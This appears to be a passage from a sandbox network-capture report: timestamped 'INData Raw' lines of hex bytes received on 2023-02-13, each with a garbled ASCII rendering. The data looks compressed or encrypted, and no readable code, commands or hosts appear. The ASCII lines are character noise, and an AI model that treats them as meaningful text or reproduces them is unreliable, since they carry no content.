                                                                                                                  2023-02-13 17:58:09 UTC143INData Raw: 91 78 c0 9b e1 f6 31 e6 f1 48 ad 48 8d 90 0d f7 9a 6a 00 49 3b 59 59 d3 7c 20 04 b7 41 57 fb d2 98 3e 5a c5 40 8e df 5f 12 82 e6 a9 1a 27 ff 8e ba e6 39 d6 6d 42 bc 4c a4 6b 94 fe 00 96 0d ba d9 1a e6 2a be 2c bc 6d c2 ad 63 6e a6 78 65 28 a2 43 15 15 3e 0a 19 c7 7f aa 6d 9f 8a 22 2d 75 a7 96 e9 28 37 35 b6 f2 23 cc af 66 f4 cb ab f1 03 5c da 86 10 36 fc 99 3e 95 36 50 6b 11 f1 39 35 59 d8 8c c9 49 f3 ea 80 7e 64 56 1d 0a e5 35 f0 9b 7f 58 4c 80 75 2a 26 44 76 e6 4e b1 da bf ee b0 f3 da 16 91 d0 5a 94 17 11 e7 22 18 d2 8a 96 3d 9f 5d 2e d8 12 96 38 2d c6 a8 5f 6f 1d 26 a7 91 1d 62 2b 65 00 b2 39 9b 01 7c 60 7d 41 67 7e e1 41 d7 f3 81 8d 5e 79 82 fd 5d 04 6c 2c 91 01 e0 fd 03 18 94 3f c8 19 11 2a a9 27 31 92 4c c3 43 f9 5c ce 25 6e 63 7b 7b c3 f1 b0 63 fb
                                                                                                                  Data Ascii: x1HHjI;YY| AW>Z@_'9mBLk*,mcnxe(C>m"-u(75#f\6>6Pk95YI~dV5XLu*&DvNZ"=].8-_o&b+e9|`}Ag~A^y]l,?*'1LC\%nc{{c
                                                                                                                  2023-02-13 17:58:09 UTC144INData Raw: 4a e6 58 ef 23 2f d7 d5 45 6e 8f 43 5c 48 6f d4 65 8a 18 fb db ac 78 ad 99 e4 34 f3 dc bf a9 f6 83 3d 2f cf 2f c9 0a 7a a6 f2 db 87 5e 1f ba 79 0b e2 62 53 07 5e 53 81 b7 3e 36 2e 0b 6a 3b bc d1 f9 2e 8c a0 76 91 c6 87 3c 75 57 a1 25 89 05 2a 30 82 16 2e b6 83 7b b0 51 d1 26 db 39 2f 53 6f 98 f3 ec 9e ed de 52 44 c7 5e 35 2f 18 f4 91 38 38 59 cc b1 2b 0b bc 6a 5f d2 2f 9c 16 19 40 0e 12 d2 0a 1e 1f 4c 3a 54 2e a5 c3 af 33 01 4a 68 e4 0d d8 0c 19 50 09 dd f7 6c 38 7e ff fb a4 8a fa 08 9e 76 09 06 57 8c 93 d1 a9 aa a1 9a 05 e4 c0 5d d1 f1 84 e7 26 b1 f3 c6 18 d6 2f 5d db f4 51 f4 05 04 cb 1b 29 a3 90 d6 fe 69 2e a8 85 26 00 ee b0 e3 5a 76 9c bd 32 01 f3 27 be 7c 2b dd 4f 71 cf d5 7f 7b 6c 32 1e c4 f2 cc 2e 30 ab 8b 38 d9 98 5e 92 dd a3 df 26 cb 16 e9 ee 63
                                                                                                                  Data Ascii: JX#/EnC\Hoex4=//z^ybS^S>6.j;.v<uW%*0.{Q&9/SoRD^5/88Y+j_/@L:T.3JhPl8~vW]&/]Q)i.&Zv2'|+Oq{l2.08^&c
                                                                                                                  2023-02-13 17:58:09 UTC145INData Raw: d5 13 61 b9 64 a6 10 56 6a bb fb af f5 0b f0 57 c1 e9 b7 33 33 bf 4d 9d 52 4c 9d e3 a1 d6 85 e1 1c e0 b7 94 86 85 e8 38 19 69 c8 cc 40 af 7b a2 4a c3 47 e5 97 35 81 23 8e e2 31 79 e4 4f 94 fa 2a db 33 16 46 a8 50 2f 03 b8 4e 57 fb fd b5 47 a2 df ac 9e 34 6b 1d 2a 9a c7 37 08 37 6b da bd d8 7b f2 71 2c 3e eb 0a a2 d5 e3 8a
                                                                                                                  Data Ascii: adVjW33MRL8i@{JG5#1yO*3FP/NWG4k*77k{q,>
                                                                                                                  2023-02-13 17:58:09 UTC145INData Raw: 01 3f 2c a2 6c 82 8b a8 5b 46 74 d6 5e 95 79 37 a4 f5 1d 85 59 12 8d b2 be b1 1f 8d 2b e6 23 4a eb 50 c0 70 4b 41 2c dd 9e 75 d9 16 69 98 5b cc ca 03 26 83 95 b9 89 81 9f f3 a1 68 4d db 22 68 ad cd 00 65 9a af 99 86 ce db 34 54 bb ce e8 bd 5e 51 94 db 1c 1a df 90 60 6d 96 f4 f9 54 f7 73 86 86 cd 84 76 67 d8 17 d9 7e e4 5b 13 8e 97 6f 32 71 75 e4 26 b2 0f 16 07 ef af b2 b3 aa 31 52 64 5c 1e 3c d1 eb c1 3f a0 d4 5e d8 55 d2 f2 17 ce aa 9d 19 e3 b6 1b 75 be 84 c6 01 a8 d7 95 56 62 56 7e 07 7b 4a 36 60 a2 a2 75 cd 6e 3e 69 2e 67 9d 59 26 e4 4c be 02 3d 42 60 b7 03 b8 c6 7e 1b 48 e1 22 fa 2e 7c da 32 e7 f5 d2 a2 09 47 e8 b7 0c 84 16 18 5b d1 56 d8 e5 73 49 8e e4 50 e4 5d f4 ae 7b 9f 06 19 df cd 98 c4 4e 74 10 99 4f 3f 7b 43 47 8c d5 a4 13 66 b2 00 bd 3a 96 0e
                                                                                                                  Data Ascii: ?,l[Ft^y7Y+#JPpKA,ui[&hM"he4T^Q`mTsvg~[o2qu&1Rd\<?^UuVbV~{J6`un>i.gY&L=B`~H".|2G[VsIP]{NtO?{CGf:
                                                                                                                  2023-02-13 17:58:09 UTC146INData Raw: 42 23 2a 99 a2 83 47 db 69 ff a6 7e 94 0a 33 db 04 91 9f 21 13 f7 52 a1 eb fe e6 3b 0e c2 fc b1 be f3 1d 48 a2 ab c8 55 10 70 7c 0a aa 51 8f 78 cf 34 4e 65 fd 9a 7c e8 27 ad 32 f8 22 8a 2e f6 bf 31 d0 be 58 7e 29 4c 88 9e ef 73 f2 14 2d e3 90 0e 1f ac 83 4a ec 23 43 21 2c 8e f7 f9 41 65 08 9f dd 9e 12 31 b5 7e b2 ba 2c 23 7e 6e 4d ef a5 89 05 00 83 90 ea db 89 12 96 4c 32 75 1f 50 6f 9b 02 5d fc 8d 39 a5 11 38 0f 2a 03 2d d6 05 dd b7 7e 1d 2f 2a be 26 01 00 c8 42 48 1a 8c d9 19 6d 5a 45 79 a4 11 22 96 aa f2 e9 5e ba 01 5d 36 3a d3 5d 7e 43 b6 a9 96 fa fd 63 e9 17 9f b1 01 98 53 c9 01 a6 e7 6d 3d e0 a6 6a 7d 48 f3 1c 49 c2 67 7c 9d 4e b9 11 68 32 34 50 48 21 1e 27 75 19 be cf ea 7e d3 8e 8c 92 b7 0a 43 d2 31 cd af 2f 08 fd fa 41 62 21 41 ac 28 5c 7b 3c 29
                                                                                                                  Data Ascii: B#*Gi~3!R;HUp|Qx4Ne|'2".1X~)Ls-J#C!,Ae1~,#~nML2uPo]98*-~/*&BHmZEy"^]6:]~CcSm=j}HIg|Nh24PH!'u~C1/Ab!A(\{<)
                                                                                                                  2023-02-13 17:58:09 UTC148INData Raw: 4e 0f fe 33 1e 52 91 48 f9 86 94 16 80 09 4d 66 31 2c d0 2c 56 f5 d0 bc 6b 2b 9c e8 0f 29 61 f6 ea c4 e3 52 df 40 5a 7e 58 f7 a1 25 7d 8e 53 c6 8e c9 eb 50 0a 12 fc ae 54 72 33 10 54 fa 6c f0 3f 7c 73 04 3f c9 d3 78 b9 24 22 3d 54 4b a6 df 14 d6 e3 15 20 30 c0 a4 c9 55 01 0b 6b 3a da 83 d2 61 04 dc 1e 87 43 db 36 af 8a 82 d6 dd 88 34 a9 34 18 65 b2 a7 b0 bc 6e 42 d6 90 f4 06 3b 95 9c 2c 21 7f 56 aa dd ba cf 92 d8 56 f4 89 6f e5 dd 68 6b 85 d8 bf 9f a7 55 f5 72 ca 6d 97 be 42 68 f9 77 0e 4c 15 34 1b 2d 24 66 27 dc 34 e8 7f f7 ec 9e 1d af 0d aa c4 8f 7f fc 34 dc e5 ad e2 be 90 23 79 b0 2d 1d 62 f0 66 e7 23 bd 08 c5 45 bb c7 2e 67 1a 1f dd 32 6b 30 a0 7a 05 a8 a3 27 83 85 10 8b ed 41 a5 e7 94 d0 40 7e 31 ee 2b 98 25 88 5b e9 b0 35 69 b5 9b 2d ab ba 08 61 7e
                                                                                                                  Data Ascii: N3RHMf1,,Vk+)aR@Z~X%}SPTr3Tl?|s?x$"=TK 0Uk:aC644enB;,!VVohkUrmBhwL4-$f'44#y-bf#E.g2k0z'A@~1+%[5i-a~
                                                                                                                  2023-02-13 17:58:09 UTC149INData Raw: 8c 3f 8d 3c 32 98 75 03 60 9c 28 2a b6 4c e8 d8 cb a6 be fd 17 12 e2 2e a9 72 9a 6c b8 c2 50 1d d4 1f 43 ec 3c c0 ad 33 15 81 88 fa 84 69 7e e0 f7 7e a1 57 8d 36 d7 d5 8d 51 20 51 75 f7 1d 9d 5d 5e 0f 55 3d 97 5d f5 00 b2 a5 c6 d9 ca a9 a8 86 68 88 5c f9 d0 91 6c f2 f4 0c 7d fa 0e 77 a3 de f8 1d 82 de f5 93 0d e3 53 11 af 16 d2 ea 38 59 04 bc f1 85 c9 ef ee d2 2f fa e6 61 01 12 12 14 ee 0f 17 33 f7 b3 a6 21 e5 54 cf 16 e0 38 30 aa f9 c2 a2 11 aa 8b d1 fc 27 75 8d 05 c7 12 81 9b f3 9e 54 f3 58 08 86 1e 78 da c0 aa f9 dd be 2a 3f e1 0d 9d 19 82 51 0e 45 0d f9 5a 94 f1 9e 24 cc c6 0f d7 14 50 de 7a ac 0c aa c2 69 fa 84 04 57 f2 3a 44 29 78 ac 22 c1 9d 6c 9c 17 9e bf 99 28 ff ef b2 57 24 ad 03 40 c5 7f 88 19 27 22 7b e5 7a 21 e7 71 6d 09 c8 fb 4d 22 c6 28 2f
                                                                                                                  Data Ascii: ?<2u`(*L.rlPC<3i~~W6Q Qu]^U=]h\l}wS8Y/a3!T80'uTXx*?QEZ$PziW:D)x"l(W$@'"{z!qmM"(/
                                                                                                                  2023-02-13 17:58:09 UTC150INData Raw: 3f d5 c8 4b d9 9d 7d dd 77 0a b8 54 63 0e 72 d0 06 28 6e 4f 88 2e ac bf 65 c8 cb 68 29 f0 92 78 27 a1 5e e0 0a 59 1f d8 68 60 bd 1d 7b da d9 db 0c 0c 09 ad 12 96 eb a4 fc 2d 3e 6e 4b d8 bf 90 c7 e1 05 f5 53 13 87 b7 df 39 f8 82 f6 3c ae 35 6d 7e 22 64 50 6c bf 1b 6a 6f 0c 9a 23 bc 1e ba 2e 29 1c 79 d0 a6 e2 01 10 24 07 15 50 95 d3 fe 99 fb 33 6a 7b e2 54 16 2f 69 05 79 23 51 d0 dc 40 2a 2a 7f 22 2e ec 3c db f4 ff b9 ce e0 86 9c c4 5c 9d 6a 80 ca fe a5 85 3b d4 6c cd 44 cd 4e e0 84 21 ce be 7b ec 59 23 69 03 22 c7 eb bf fe 34 c0 df f1 a4 97 94 4f 69 7c 67 30 7f 56 6e 49 ea b3 04 7b 97 9f 71 25 98 66 cb 90 4c 44 7f 1c 87 fe 4b 32 4b 0c 08 20 36 e3 e4 e0 10 58 24 c8 cf 3a 51 0d ff d4 e1 b0 ee a0 21 47 5d 38 ec 1d 99 b4 07 b3 87 e6 1e 54 28 0c d3 82 40 c3 83
                                                                                                                  Data Ascii: ?K}wTcr(nO.eh)x'^Yh`{->nKS9<5m~"dPljo#.)y$P3j{T/iy#Q@**".<\j;lDN!{Y#i"4Oi|g0VnI{q%fLDK2K 6X$:Q!G]8T(@
                                                                                                                  2023-02-13 17:58:09 UTC151INData Raw: 14 cb d2 eb cc d2 6c be 70 61 2c 79 47 cf 31 07 01 c1 1b e7 12 a6 9f b6 70 01 80 51 eb 17 d2 5d af bd d6 c5 29 fb df 12 3a 1a 48 0e 1f 0e 35 39 0b 53 26 e3 b3 c5 a3 8f 45 d3 33 87 3c ea bb 47 70 e7 62 ce 01 a0 2b c8 78 f7 c8 04 7a 04 66 fc f1 dd d4 51 bc 9f 12 39 63 6c 16 8a 29 70 7c 63 11 16 a6 a9 1a 16 3e 24 9d f6 7b 5b db 64 17 a6 52 4c f8 28 ee a9 e6 91 a6 cc 5b b4 e3 0b 3d 8b fc ae d5 1f f8 cb 9d 3b 79 92 3b ae 58 98 1b 09 73 0b f9 a6 dd 3f 61 e8 c0 28 a9 35 f0 09 8b 30 21 10 81 f8 a8 31 25 20 f0 30 dc d7 05 85 f1 65 52 c3 4c ec 4e b4 ea 28 c6 5b e9 7b 4c bc c3 0d 0f fe 5b b6 45 35 b7 39 e8 33 b1 97 72 c7 7d 71 b7 40 2f 19 e8 94 0d db b8 3b 4d 77 06 6f 22 96 13 02 95 2c 32 4f d8 ed c5 c6 b3 01 63 dd 78 10 87 42 6e 7b db de 4e b1 47 4b 51 27 62 87 7e
                                                                                                                  Data Ascii: lpa,yG1pQ]):H59S&E3<Gpb+xzfQ9cl)p|c>${[dRL([=;y;Xs?a(50!1% 0eRLN([{L[E593r}q@/;Mwo",2OcxBn{NGKQ'b~
                                                                                                                  2023-02-13 17:58:09 UTC153INData Raw: 23 3d 46 0b d4 72 65 65 ae bc a0 6a 41 a2 3a fb 65 8a 0f c3 5a bb d3 2a 03 f2 a7 37 93 84 43 8a cf 2a fc be 9a aa b6 0e eb 22 95 38 0c 70 42 d7 75 77 75 40 5d 54 e5 42 11 ff 41 c5 f8 a8 c2 66 c9 5f 49 a3 18 d0 d2 23 4c 79 f1 ab 25 cf 3f 96 25 42 03 a5 26 fa dc c1 a1 c9 09 11 11 c0 dc 14 1c 99 05 0b 27 20 68 ff 16 07 85 79 19 d6 82 7a 87 b4 b6 ac 39 2e 78 77 16 b3 2b 8f a1 03 0b 6e f1 dc 04 d4 9e d7 0d 62 df 9c 03 41 23 fc e8 b7 ae d2 1d c9 6f d1 df f5 be 49 27 6f 3f f6 97 e2 a8 d7 83 1d cc 4b 5c 96 40 1f 51 98 da df dc 9d 21 b1 90 e8 dd ad 0b fe b7 cf 39 86 f7 a4 d7 4a 85 fd 8d 40 38 00 17 99 5c 9c 8f 56 76 9a 39 26 9c 8d c0 83 a8 78 fd c6 09 45 8b 11 97 0e b7 10 cb 71 66 31 a7 1d 78 0f d2 0f d4 ed 89 f8 f0 e2 6c 32 04 da c6 35 35 fa a5 f7 b4 ef 72 ee b5
                                                                                                                  Data Ascii: #=FreejA:eZ*7C*"8pBuwu@]TBAf_I#Ly%?%B&' hyz9.xw+nbA#oI'o?K\@Q!9J@8\Vv9&xEqf1xl255r
                                                                                                                  2023-02-13 17:58:09 UTC154INData Raw: a7 3c 16 61 d7 00 e8 09 fd de ab 3c e8 5f d3 6d 7f ef 0b c9 97 de 31 af 1e ee 22 e8 8f 63 39 68 7e ae bd 05 71 53 86 75 81 47 d4 1e 4d 33 e6 bb b7 01 85 1b bc 10 73 98 70 74 75 1e d0 18 ac 75 36 b5 da 47 fc c0 41 8e 02 81 be 71 dc 2c 04 76 f5 76 db b6 bd e3 60 ed 0d 09 b1 e8 ea 0a ef a1 1c c1 be 5b 25 7d 2b 43 a5 43 c6 78 06 b5 40 7b a1 0e d6 d7 bf 13 c9 a4 b5 b3 f5 68 2a 75 0c 9b 48 6a 0e 91 37 95 0b 94 5a 3e cc 40 b6 81 4b 38 90 7d 1a 0e 90 22 37 c9 ef 73 b5 4c 20 77 db 66 c5 74 6f cc 85 0e 78 50 21 54 07 52 79 48 00 ae 93 05 a0 79 51 cb 6a 5d bb 74 64 6d cf 41 ea 01 47 22 b0 d0 4b 90 ba 89 a6 13 d8 1f a2 c8 23 f9 4e 8b 98 f0 92 d6 ae 19 7a df 5a 7e 3b cd 13 36 b8 38 08 14 df f6 9f e6 3b e2 4e df 9e 6a fa ac f5 e0 52 08 9a 55 6f 28 56 d3 32 bc 3e 8e 74
                                                                                                                  Data Ascii: <a<_m1"c9h~qSuGM3sptuu6GAq,vv`[%}+CCx@{h*uHj7Z>@K8}"7sL wftoxP!TRyHyQj]tdmAG"K#NzZ~;68;NjRUo(V2>t
                                                                                                                  2023-02-13 17:58:09 UTC155INData Raw: 54 3a c4 7b ca 66 cd 9c 5f 23 24 f6 ea 9d cf ca a5 ca 79 23 70 ca d4 97 82 80 73 8b 91 59 09 15 e5 c7 b8 f9 de e6 4d 80 ae b5 9f 8c a1 4c f7 ff 5f e9 3c 51 93 96 90 d6 8e a7 6b 70 2b 4d 2a f8 0e 8f 3d fc 47 a8 b5 48 7c 57 d1 91 d5 4f d6 6e 5e aa 6c 7f 98 fb 28 18 cc d6 29 c8 d0 ff eb 83 1e 9b 1c ef ee c3 5d 7f dc 9a 86 8b 79 92 6a 17 ae 3c 7f 6c 8c a5 01 88 01 83 ac 1a c4 c9 86 ed c7 5f 5d 3d 2e 41 1f 90 75 c5 65 98 f8 04 9b c6 6b d1 6d a1 31 b8 29 b9 d6 37 69 35 5e e2 b4 84 74 b2 33 f4 ea 92 8c c2 17 68 38 d8 df b8 c1 4e 4f 27 01 5e 8f b0 e3 b4 3b 8a 2c c9 3f 7e d7 5a 30 39 74 43 87 eb ae bb bb 91 8b 1e 1a 80 6c d0 1b f3 65 b6 cc 99 0f 62 c8 44 78 97 71 5b 93 30 33 c4 d5 ca 98 db 07 d6 f2 dd c1 29 d2 00 e0 59 f7 15 ca d8 ed d4 db b9 15 3e c1 5f fa 70 f7
                                                                                                                  Data Ascii: T:{f_#$y#psYML_<Qkp+M*=GH|WOn^l()]yj<l_]=.Auekm1)7i5^t3h8NO'^;,?~Z09tClebDxq[03)Y>_p
                                                                                                                  2023-02-13 17:58:09 UTC156INData Raw: 03 8e e6 14 ba 83 a1 cb 40 f8 5d 59 d5 3c d1 50 45 77 8c c7 1c ad ff 40 a8 b4 64 cc 9f 83 fb 72 fe e6 2d 46 45 81 e6 97 bc f8 99 58 79 82 b5 74 32 68 43 79 89 d2 c4 8a 6c be ff 7d 09 e3 38 77 55 5b 25 4d 6a a1 37 30 d5 60 b3 c4 74 54 c3 c5 c1 76 ce c3 45 8f 03 a7 2f fe 4f 7b 53 00 ba 13 5b bd 02 a1 16 f2 d5 c0 53 f6 27 8a 3c 53 2a ac 60 45 64 b3 72 42 ae ee 3a 56 ac c0 2d 4f ad 69 fc eb 8c 76 5d 7b 42 0f 95 da c5 d9 58 ad f8 d5 09 1a ba 0b 76 7c d1 49 4b 65 65 51 de 83 48 9b 33 40 e1 bc f2 8a 83 3d da b0 f4 19 ff 2f b2 62 d5 b1 11 73 a8 25 9a 0e 04 2c a7 1a 6c 47 a8 41 1c 23 52 2c c5 72 36 ee 1e 74 1d 98 c2 75 5e 92 db 5b 53 d8 d8 7e f5 9a 78 b3 81 c6 b0 e2 09 34 ae d7 70 50 09 49 65 63 00 e4 2c 33 aa 28 07 f7 5f d0 bc 73 63 b2 2e ee c3 23 69 07 39 99 78
                                                                                                                  Data Ascii: @]Y<PEw@dr-FEXyt2hCyl}8wU[%Mj70`tTvE/O{S[S'<S*`EdrB:V-Oiv]{BXv|IKeeQH3@=/bs%,lGA#R,r6tu^[S~x4pPIec,3(_sc.#i9x
                                                                                                                  2023-02-13 17:58:09 UTC157INData Raw: a1 3d 0f 48 94 38 49 ae 2c 15 98 e9 0a b5 14 e1 df 7e f7 b4 62 7d d4 3e e2 e1 82 f1 24 d5 ae 78 8e c0 93 fd 43 b1 71 9c 70 40 41 a3 fb d1 dd 67 51 80 85 43 26 eb 30 68 3e 14 1c 32 87 39 82 3e 84 70 4b 48 63 29 ae 7d d2 aa 23 f0 b0 1f 96 43 1e ed bc b8 e1 84 91 19 2e 4e 77 b1 42 87 5a a2 b1 34 27 75 1e fc 2d 7c 01 21 c5 3e 65 2c d1 3a e5 35 ed 83 98 ed 1f a6 ef a2 97 03 37 cc 1c 1a a5 97 1e 95 b4 af 1c b1 c0 6b ce d2 1b 2d 72 49 02 b4 74 9b aa 94 f4 b2 6b 51 34 fa e0 54 ef 32 31 7d 92 4e ee a2 3f e9 70 ed ab de 8f 76 a9 76 39 a8 1f 4e 7b dc 4f c0 67 d5 5c 7f 33 46 bb 6b 98 fd 83 9b 13 32 fc 56 17 06 6e fd dc 8a c2 fe 0d 62 37 fd 68 75 bd d6 1d fd ec 97 9b ef 56 ee 6c b0 c8 89 06 15 10 12 00 14 82 a0 d6 15 13 a0 e1 2a 95 1f ae ee 80 03 22 73 43 07 14 82 8a
                                                                                                                  Data Ascii: =H8I,~b}>$xCqp@AgQC&0h>29>pKHc)}#C.NwBZ4'u-|!>e,:57k-rItkQ4T21}N?pvv9N{Og\3Fk2Vnb7huVl*"sC
                                                                                                                  2023-02-13 17:58:09 UTC159INData Raw: c9 1b eb 4b 39 c1 af cf 9f df f8 ef 6b b8 47 ff 36 da 40 f8 36 a9 11 9c 32 19 e6 a8 9f 64 fc cd 4b a7 ab 51 d3 c0 82 46 55 36 ad 54 1b 8b 1f 38 9b 6f 1a 58 58 3d a8 9a 6d af 5a 90 34 ad 79 c0 4c bf 3c 42 c4 67 eb 70 82 75 f3 ee 17 0e 21 bf 74 4c f0 2a f7 21 4b d1 6b 88 de e2 e1 73 52 3c 67 90 a5 b4 b3 e0 df 43 66 52 c6 9c 97 0a a3 5a 54 33 ce c1 df 49 b6 04 a6 40 7b 17 d0 e9 af 3e 2a 4e 8f c7 03 17 a4 1d af 66 19 59 98 12 37 82 b8 e3 ea 10 05 81 0f 06 43 9f 22 b0 a3 38 96 f0 9a 96 a6 e3 ad b3 1c 1f f8 35 5d aa 16 01 b7 d1 51 e1 75 a1 9c dc 05 96 0f 85 c2 e4 81 6c a9 78 b2 3a c7 dc 98 c2 1c 1f 0a 7d d2 dd d7 0a ec ad f0 c0 23 9a be 5a 5c 19 d8 39 ad 25 cd 15 c8 31 7a a7 f9 0f 31 96 59 82 61 90 07 97 cd 88 0e 67 cc 7a 56 5a d3 fb 0f 4c 22 be 01 82 d6 4a b1
                                                                                                                  Data Ascii: K9kG6@62dKQFU6T8oXX=mZ4yL<Bgpu!tL*!KksR<gCfRZT3I@{>*NfY7C"85]Qulx:}#Z\9%1z1YagzVZL"J
                                                                                                                  2023-02-13 17:58:09 UTC160INData Raw: a4 80 98 47 3d 0c 67 11 aa 8a 10 31 3e 30 77 79 63 3f 13 be 1e 74 03 37 8b 73 8a b4 67 e5 84 07 77 e6 9d 62 8b 37 b9 92 09 ba b4 51 cd 16 cd 1e 7f 64 92 4d dc 41 66 a0 be 3d 62 c4 68 09 1e ea c1 6a ec 81 f5 35 e7 31 82 cd 14 d9 a0 6a d3 79 01 bd d3 42 e3 66 ed 7d e1 a8 3c e8 aa 08 cb 68 d2 ba 4e 14 f3 e2 1a a9 3c cf 19 03 1e 0a 4c 92 70 aa be 1e aa e5 1b 3a 64 02 29 83 cf 1d 95 28 df e2 4e 0b 32 41 1f a3 de 2e 48 29 22 35 e7 ae 27 14 bb 94 97 60 80 24 3f c8 49 53 44 ce 37 9a 97 1d 55 26 cf b6 24 5d 91 e3 54 1e 28 63 34 39 1d 68 48 20 5d a2 10 8c 24 b0 fe db 69 09 7a 25 fe c4 0a 45 8f 67 ea ec 24 d5 86 be c7 41 7c ef a5 c0 dd 34 9b 0e a5 70 4f 91 f1 3f a5 4e 0f f9 67 c4 20 ee 74 be 63 9c 51 b7 5d dc ea c5 bb 45 00 85 4a 01 93 09 09 96 7d 51 78 6d 8f 1d d9
                                                                                                                  Data Ascii: G=g1>0wyc?t7sgwb7QdMAf=bhj51jyBf}<hN<Lp:d)(N2A.H)"5'`$?ISD7U&$]T(c49hH ]$iz%Eg$A|4pO?Ng tcQ]EJ}Qxm
                                                                                                                  2023-02-13 17:58:09 UTC161INData Raw: af 66 08 5d f8 12 06 5c 44 89 0c f6 ad 46 46 fb 23 7a f1 bc a7 57 23 6e 43 e9 cc 67 b8 f5 2d 19 39 07 74 b3 34 a7 a8 6f 2d ac 4b 8b 71 1f 73 04 e9 65 70 d9 43 e8 90 7b 20 76 41 c0 9a f2 b3 98 df 9b d2 79 b7 16 86 d3 8c 85 31 23 67 eb 85 c4 99 85 3b 78 cc 5b 11 35 59 dd f1 4c 27 59 05 23 a0 27 51 84 da 98 4c 7a c3 02 35 8d
                                                                                                                  Data Ascii: f]\DFF#zW#nCg-9t4o-KqsepC{ vAy1#g;x[5YL'Y#'QLz5
                                                                                                                  2023-02-13 17:58:09 UTC161INData Raw: cf f0 2b de 67 f1 30 e9 c7 35 15 a5 03 f6 c3 3c 1f 3f 14 eb 4d 42 eb 10 b5 38 37 50 58 31 98 9b c2 71 61 53 23 0e c7 3c ba f9 d4 58 25 b2 c8 84 52 34 34 19 9e 83 a8 52 b5 a8 16 0c ec 87 c3 de ad cd c0 35 9a 1e ea 4b 45 01 42 32 9d 3d c3 cc 08 7f 93 5b 39 ee 05 ff 7a e5 da e9 cc 85 7a 0f dd 1a 05 27 55 a5 a6 78 52 3f fa 0f 6a 18 84 61 55 3b ad f7 97 60 c5 e5 bb 67 ee 97 cf d0 0d 8d 76 2c 61 86 65 60 1b 29 93 36 f8 88 fd a3 1f ac a6 2c e5 3f 1c af 33 b8 3c b2 14 3e cc af f9 13 8c a7 19 af db 23 bf 33 bd df 6c 5c 9e 27 d0 20 24 72 ca 8f 5e 81 d2 33 ab b8 45 06 1e eb 20 40 63 0b d7 50 61 f7 0b 06 f4 65 fb 48 04 24 2e 20 6f 02 83 56 f6 df b6 20 2f 2d 68 1b 9a 52 3f 79 2b 17 e7 90 d7 5a f8 88 7c 8c 3d 46 15 5f 05 7e e6 bc 18 a4 55 02 f3 f9 fc de 36 39 b3 f0 a1
                                                                                                                  Data Ascii: +g05<?MB87PX1qaS#<X%R44R5KEB2=[9zz'UxR?jaU;`gv,ae`)6,?3<>#3l\' $r^3E @cPaeH$. oV /-hR?y+Z|=F_~U69
                                                                                                                  2023-02-13 17:58:09 UTC162INData Raw: 61 8e 34 05 78 18 5d f7 8b 70 d2 50 48 8b a1 8d b5 a9 94 61 65 bc a6 41 2a a5 b9 1a 01 a3 fc ad 8a 4b 2b 05 b4 28 9d 39 56 31 5d ce 40 e9 c2 c5 ba 75 03 17 df d2 72 4e 2c 53 59 48 c2 47 80 bb c8 3f 8c 0b 1c 14 15 5a 13 e0 b0 05 5f cf cd 9d 8e 45 d4 48 37 fa 01 84 58 3b b2 3e ab ab 2f e2 dc 26 60 19 34 a5 63 72 13 92 9b 36 16 20 c6 4c b4 21 33 92 d6 15 86 3c fc 55 11 30 6a 4c 81 9e 29 66 8c d8 45 40 0c 03 3a b9 2d 51 1c f8 d7 0e 28 de 51 cd 23 29 7c 75 09 6f c6 e6 64 c3 dd 60 64 00 b7 83 66 a5 be 09 6a 9a 20 7c 1c ee 01 82 6f 83 85 48 10 98 cd e5 c7 0c af c7 0b 16 d7 56 cb 99 07 f5 e0 da 98 e4 23 44 6a 66 6f 2f 40 15 51 43 30 f7 7e 65 5b 23 ef 7b 50 bb 7a d7 69 69 03 e5 8b 04 e0 e8 06 14 b6 5b 6f ce 08 fc 18 ea d2 f2 4f 94 53 27 b4 92 9e 00 dd 86 a7 d4 a5
                                                                                                                  Data Ascii: a4x]pPHaeA*K+(9V1]@urN,SYHG?Z_EH7X;>/&`4cr6 L!3<U0jL)fE@:-Q(Q#)|uod`dfj |oHV#Djfo/@QC0~e[#{Pzii[oOS'
                                                                                                                  2023-02-13 17:58:09 UTC164INData Raw: 32 44 45 45 5b f4 d1 32 1d 78 7c d6 34 a6 6b 22 17 d5 fe 47 21 7e 7b da cf a8 29 2f fe 05 fd 8d ad cb 05 84 b4 5e cd bb 62 d3 2a 47 3e 17 74 55 63 ef 67 eb e5 42 47 3f e3 c2 41 ad eb 87 94 f3 2c 9a 29 59 46 d1 34 5d 91 9d f9 c2 d9 29 fb 65 32 08 d6 b3 c4 d4 53 f6 d3 b9 fe a7 b0 55 c0 05 ea 29 5a 5f 77 2b 2e 68 2a 16 a7 27 14 4c 76 a9 9c d2 a3 7c 41 06 73 42 37 d7 e3 64 87 bd 45 a2 f6 70 af 5b 34 53 a0 24 24 cf dd 7d 98 3f 16 e5 23 f3 f9 4a c1 a8 58 00 5f 9f c5 d5 d1 5b c1 ab 80 e5 b9 3d 76 d1 ad 71 07 60 18 02 80 48 f9 21 a9 f9 71 a4 1f 6e 0d 8d 53 7a f8 fc d8 63 1e f6 3a c3 b2 6a 60 82 71 b2 9f a2 fb 6c cf 32 e1 a4 dd 7b 46 45 9c ac 0f 64 5d 56 d5 bc 12 fa d8 28 d7 19 c3 89 17 3c 78 4f a0 64 73 99 6b 91 33 cd 18 72 36 25 90 3a 97 f0 e2 66 60 81 52 3f 83
                                                                                                                  Data Ascii: 2DEE[2x|4k"G!~{)/^b*G>tUcgBG?A,)YF4])e2SU)Z_w+.h*'Lv|AsB7dEp[4S$$}?#JX_[=vq`H!qnSzc:j`ql2{FEd]V(<xOdsk3r6%:f`R?
                                                                                                                  2023-02-13 17:58:09 UTC165INData Raw: 6b 16 22 03 47 58 f8 31 d2 61 77 07 a0 00 1c 1c ea 18 2a 8f d8 f6 0e 9f 67 e5 fa 44 9e e8 a1 a3 53 dd 31 52 b4 8e 1a 87 cd c3 7a fb 1e 57 74 a3 0d 0a e8 8f 4f 6a 04 7a 81 51 a6 b8 fa 12 55 1e ed 83 45 bd f9 b0 41 ce 12 ca c7 15 33 32 70 c8 6a aa 4d f3 d5 b0 dd c9 02 bb 1e 5e bc 93 00 62 9e fb 00 84 9d c0 9b 37 94 40 03 7f 1b 2e 72 12 fe 57 b3 92 35 4c 2c 0d 27 44 d8 8e d9 96 aa 17 d9 a3 c4 0a f6 1d d6 5a d5 0b 4e 97 67 c7 39 0a b5 06 4b 68 f7 bb 14 ca 25 d1 a9 dc 59 56 38 7c bc 96 0b 81 76 9a 88 56 02 b7 f3 b1 d1 20 bc 42 cc 19 2f 9a 8d 48 81 56 91 ad 9e 25 38 20 78 f8 af f6 c1 f6 e1 50 eb 3c 76 2a 43 90 2b 